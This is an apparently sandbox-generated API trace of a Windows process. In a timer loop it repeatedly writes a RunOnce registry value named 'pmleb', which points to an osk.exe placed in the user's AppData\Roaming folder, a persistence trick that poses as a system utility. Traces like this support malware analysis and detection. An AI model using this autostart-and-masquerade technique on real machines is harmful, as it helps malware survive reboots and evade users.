[0100.440] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.440] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.440] SetTimer (hWnd=0x20280, nIDEvent=0x235a, uElapse=0xa, lpTimerFunc=0x0) returned 0x235a [0100.440] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.454] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.454] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.454] KillTimer (hWnd=0x20280, uIDEvent=0x235a) returned 1 [0100.454] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.455] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.455] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.455] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.455] RegCloseKey (hKey=0x280) returned 0x0 [0100.455] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.455] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.455] SetTimer (hWnd=0x20280, nIDEvent=0x235b, uElapse=0xa, lpTimerFunc=0x0) returned 0x235b [0100.456] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.469] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.469] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.470] KillTimer (hWnd=0x20280, uIDEvent=0x235b) returned 1 [0100.470] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.470] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.470] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.471] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.471] RegCloseKey (hKey=0x280) returned 0x0 [0100.471] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.471] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.471] SetTimer (hWnd=0x20280, nIDEvent=0x235c, uElapse=0xa, lpTimerFunc=0x0) returned 0x235c [0100.471] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.485] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.485] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.485] KillTimer (hWnd=0x20280, uIDEvent=0x235c) returned 1 [0100.486] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.486] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.486] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.486] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.486] RegCloseKey (hKey=0x280) returned 0x0 [0100.486] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.487] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.487] SetTimer (hWnd=0x20280, nIDEvent=0x235d, uElapse=0xa, lpTimerFunc=0x0) returned 0x235d [0100.487] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.501] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.501] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.501] KillTimer (hWnd=0x20280, uIDEvent=0x235d) returned 1 [0100.501] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.502] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.502] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.502] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.502] RegCloseKey (hKey=0x280) returned 0x0 [0100.502] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.502] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.502] SetTimer (hWnd=0x20280, nIDEvent=0x235e, uElapse=0xa, lpTimerFunc=0x0) returned 0x235e [0100.502] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.522] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.522] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.522] KillTimer (hWnd=0x20280, uIDEvent=0x235e) returned 1 [0100.523] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.523] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.523] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.523] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.523] RegCloseKey (hKey=0x280) returned 0x0 [0100.524] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.524] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.524] SetTimer (hWnd=0x20280, nIDEvent=0x235f, uElapse=0xa, lpTimerFunc=0x0) returned 0x235f [0100.524] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.532] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.532] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.532] KillTimer (hWnd=0x20280, uIDEvent=0x235f) returned 1 [0100.532] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.533] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.533] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.533] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.533] RegCloseKey (hKey=0x280) returned 0x0 [0100.533] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.533] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0100.533] SetTimer (hWnd=0x20280, nIDEvent=0x2360, uElapse=0xa, lpTimerFunc=0x0) returned 0x2360 [0100.533] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.547] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.547] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.548] KillTimer (hWnd=0x20280, uIDEvent=0x2360) returned 1 [0100.548] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.548] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.548] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.549] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.549] RegCloseKey (hKey=0x280) returned 0x0 [0100.549] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.549] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.549] SetTimer (hWnd=0x20280, nIDEvent=0x2361, uElapse=0xa, lpTimerFunc=0x0) returned 0x2361 [0100.549] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.564] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.564] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.564] KillTimer (hWnd=0x20280, uIDEvent=0x2361) returned 1 [0100.565] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.565] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.565] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.565] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.566] RegCloseKey (hKey=0x280) returned 0x0 [0100.566] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.566] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.566] SetTimer (hWnd=0x20280, nIDEvent=0x2362, uElapse=0xa, lpTimerFunc=0x0) returned 0x2362 [0100.566] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.581] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.581] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.582] KillTimer (hWnd=0x20280, uIDEvent=0x2362) returned 1 [0100.582] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.582] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.582] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.583] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.583] RegCloseKey (hKey=0x280) returned 0x0 [0100.583] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.583] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.583] SetTimer (hWnd=0x20280, nIDEvent=0x2363, uElapse=0xa, lpTimerFunc=0x0) returned 0x2363 
[0100.583] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.602] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.602] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.602] KillTimer (hWnd=0x20280, uIDEvent=0x2363) returned 1 [0100.602] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.603] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.603] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.603] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.603] RegCloseKey (hKey=0x280) returned 0x0 [0100.603] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.604] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.604] SetTimer (hWnd=0x20280, nIDEvent=0x2364, uElapse=0xa, lpTimerFunc=0x0) returned 0x2364 [0100.604] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.631] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.631] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.632] KillTimer (hWnd=0x20280, uIDEvent=0x2364) returned 1 [0100.632] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.632] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.632] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.633] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.633] RegCloseKey (hKey=0x280) returned 0x0 [0100.633] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.633] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.633] SetTimer (hWnd=0x20280, nIDEvent=0x2365, uElapse=0xa, lpTimerFunc=0x0) returned 0x2365 [0100.633] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.641] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.641] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.642] KillTimer (hWnd=0x20280, uIDEvent=0x2365) returned 1 [0100.642] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.642] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.642] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.642] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.643] RegCloseKey (hKey=0x280) returned 0x0 [0100.643] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.643] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.643] SetTimer (hWnd=0x20280, nIDEvent=0x2366, uElapse=0xa, lpTimerFunc=0x0) returned 0x2366 [0100.643] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0100.665] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.665] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.665] KillTimer (hWnd=0x20280, uIDEvent=0x2366) returned 1 [0100.665] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.666] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.666] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.666] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.666] RegCloseKey (hKey=0x280) returned 0x0 [0100.666] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.666] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.666] SetTimer (hWnd=0x20280, nIDEvent=0x2367, uElapse=0xa, lpTimerFunc=0x0) returned 0x2367 [0100.666] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.672] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.672] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.673] KillTimer (hWnd=0x20280, uIDEvent=0x2367) returned 1 [0100.673] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.673] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.673] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.674] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.674] RegCloseKey (hKey=0x280) returned 0x0 [0100.674] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.674] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.674] SetTimer (hWnd=0x20280, nIDEvent=0x2368, uElapse=0xa, lpTimerFunc=0x0) returned 0x2368 [0100.674] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.688] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.688] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.688] KillTimer (hWnd=0x20280, uIDEvent=0x2368) returned 1 [0100.689] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.689] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.689] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.689] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.689] RegCloseKey (hKey=0x280) returned 0x0 [0100.690] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.690] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.690] SetTimer (hWnd=0x20280, nIDEvent=0x2369, uElapse=0xa, lpTimerFunc=0x0) returned 0x2369 [0100.690] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.704] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.704] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.704] KillTimer (hWnd=0x20280, uIDEvent=0x2369) returned 1 [0100.705] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.705] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.705] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.705] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.706] RegCloseKey (hKey=0x280) returned 0x0 [0100.706] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.706] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.706] SetTimer (hWnd=0x20280, nIDEvent=0x236a, uElapse=0xa, lpTimerFunc=0x0) returned 0x236a [0100.706] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.732] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.732] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.733] KillTimer (hWnd=0x20280, uIDEvent=0x236a) returned 1 [0100.733] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.734] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.734] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.734] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.734] RegCloseKey (hKey=0x280) returned 0x0 [0100.734] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.734] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.734] SetTimer (hWnd=0x20280, nIDEvent=0x236b, uElapse=0xa, lpTimerFunc=0x0) returned 0x236b [0100.735] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.735] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.735] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.735] KillTimer (hWnd=0x20280, uIDEvent=0x236b) returned 1 [0100.735] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.735] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.735] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.736] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.736] RegCloseKey (hKey=0x280) returned 0x0 [0100.736] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.736] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.736] SetTimer (hWnd=0x20280, nIDEvent=0x236c, uElapse=0xa, lpTimerFunc=0x0) returned 0x236c [0100.736] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.750] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.750] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.751] KillTimer (hWnd=0x20280, 
